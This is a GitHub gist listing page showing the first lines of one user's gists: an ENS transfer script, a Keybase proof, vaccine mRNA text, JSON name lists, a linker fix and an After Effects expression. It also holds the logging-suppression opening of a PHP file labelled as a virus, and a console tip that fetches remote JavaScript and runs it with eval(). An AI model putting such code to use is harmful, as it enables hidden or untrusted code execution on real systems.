Skip to content

Instantly share code, notes, and snippets.

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / ensDomainTransfer.js
Created October 2, 2021 04:18 — forked from andrekorol/ensDomainTransfer.js
Flashbots ENS domain transfer
const hre = require('hardhat');
const { map } = require('underscore');
require('dotenv').config();
const {
FlashbotsBundleProvider,
} = require('@flashbots/ethers-provider-bundle');
const ENS = require('./ENSABI.json');

Keybase proof

I hereby claim:

  • I am saw-mon-and-natalie on github.
  • I am sawmonandnatalie (https://keybase.io/sawmonandnatalie) on keybase.
  • I have a public key ASD-lsiPSVSifdZGA049ptrEsk6oeiqOL4mqMzSkKxgRlAo

To claim this, I am signing this object:

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / BioNTech-Pfizer-SARS-CoV-2-Vaccine.md
Last active December 26, 2020 21:36
Source Code for BioNTech/Pfizer SARS-CoV-2 Vaccine

BioNTech/Pfizer SARS-CoV-2 Vaccine

Source Code

GAG AAΨ AAA CΨA GΨA ΨΨC ΨΨC ΨGG ΨCC CCA CAG ACΨ CAG AGA GAA CCC GCC ACC
AΨG ΨΨC GΨG ΨΨC CΨG GΨG CΨG CΨG CCΨ CΨG GΨG ΨCC AGC CAG ΨGΨ GΨG AAC CΨG 
ACC ACC AGA ACA CAG CΨG CCΨ CCA GCC ΨAC ACC AAC AGC ΨΨΨ ACC AGA GGC GΨG 
ΨAC ΨAC CCC GAC AAG GΨG ΨΨC AGA ΨCC AGC GΨG CΨG CAC ΨCΨ ACC CAG GAC CΨG 
ΨΨC CΨG CCΨ ΨΨC ΨΨC AGC AAC GΨG ACC ΨGG ΨΨC CAC GCC AΨC CAC GΨG ΨCC GGC 
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / _worker.php
Last active October 23, 2024 09:12
lowerbeforwarden virus
/*
* Created by cpl.php
*/
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(3600);
["Indiana University-Purdue University Indianapolis and Purdue University", "Yaroslavl State University", "University of Texas at Aus", "Institute of Physics, Estonian Academy of Sciences", "University of Ballarat", "St. Petersburg State Pedagogical University and St. Petersburg State University", "University of Texas at Houston", "University of Ioannina", "Universidad de Valladolid and Universidad Aut\u00f3noma de Nuevo Le\u00f3n", "Universit\u00e9 de Reims Champagne-Ardenne", "University of California, Berkeley", "Universit\u00e9 Bordeaux 1 and l'Institut National de Recherche en Informatique et en Automatique (INRIA)", "University of Agriculture", "Universidade de Lisboa and University of Texas at Austin", "Universit\u00e9 de Fribourg", "Loughborough University", "Babe\u015f-Bolyai Univers", "Ecole Centrale de Nantes", "Institute of Mathematics of SBRAS", "Hungarian Academy of Sciences and Taras Shevchenko National University of Kyiv", "University of California, Irvine", "Drexel University", "L'\u00c9cole
This file has been truncated, but you can view the full file.
["Archie Higdon", "Donald Hill Rock", "William B. Stiles", "James W. Beach", "Ralph Harry Tripp", "Richard John Clasen", "Sang Ahnn", "Yanming Yin", "Richard Carl Gilbert", "Arnold Lewis Villone", "Maria Holmes Mor", "Mary Kelley", "Bing Wang", "Scott Everett Rimbey", "Betty Carol Adjemian", "Michael Bahry Tamburro", "Jonathan George Bell", "Lance Fiondella", "Farrokh Sassani", "John Martin Bachar, Jr.", "Daniel Mohammad Sepasi", "Tae Geun Cho", "Matthew R. A. Sedlock", "Niels Gronbaek", "Fang Xie", "Zhao Xu", "Thomas Anthony Mc Cullough", "Lei Wang", "Melvin Rosenfeld", "Nadia Pavlivna Kozachenko", "Thomas Anthony Slobko", "Thorsten Bonato", "William Elisha Spraglin", "Peter Van Lancker", "Rodrigo Banuelos", "Silvia Harmsen", "Christopher Leigh Cagan", "Jeremy C. Smith", "Charles R. Clark", "Jeffrey Thomas Moore", "Frank No\u00e9", "Joseph Nicholas Ruskiewicz", "Bao Gia Nguyen", "Arsenii Rudich", "Scott Schumacher", "Enrico Avventi", "Fredric Martin Pollack", "Anna P\u00f3sfai", "Marko Kranjc", "Roger Van Ke
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / discogs_usernames.json
Last active December 30, 2019 10:07
2019 Top 5000+ Discogs Contributors
[
"Diognes_The_Fox",
"degm",
"chrisbaerchen",
"gippy",
"velove",
"teninchfan",
"ladrodipolli",
"choan",
"brianvy",
@Saw-mon-and-Natalie
Saw-mon-and-Natalie / 0_ld-library-not-found-for-lgccfix.md
Last active October 9, 2019 04:45
macOS: ld: library not found for -lgcc

phpbrew install x.x.x +everything

While installing php with phpbrew, I kept getting the following error:

ld: library not found for -lgcc

I needed to symlink a dylib:

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / loadExternalJs.md
Created September 27, 2019 06:38
javascript code snippet to use to load external JS libraries inside chrome dev tools console

How to import external JS libraries in Chrome dev tools console

fetch('link-to-external-js-library')
    .then(response => response.text())
    .then(text => eval(text))

example, loading lodash:

@Saw-mon-and-Natalie
Saw-mon-and-Natalie / persistent_random_position.jsx
Created August 11, 2019 08:40
Persistent Random Position on Marker / Adobe After Effects CC
temp = thisComp.layer("Null 1").transform.anchorPoint[0];
markers = thisComp.layer("Null 1").marker
idx = markers.nearestKey(time).index;
if(markers.nearestKey(time).time > time) { idx--; }
if(idx < 1) { idx = 1; }
var seed = time;
if(temp == 50) {
seed = time;
}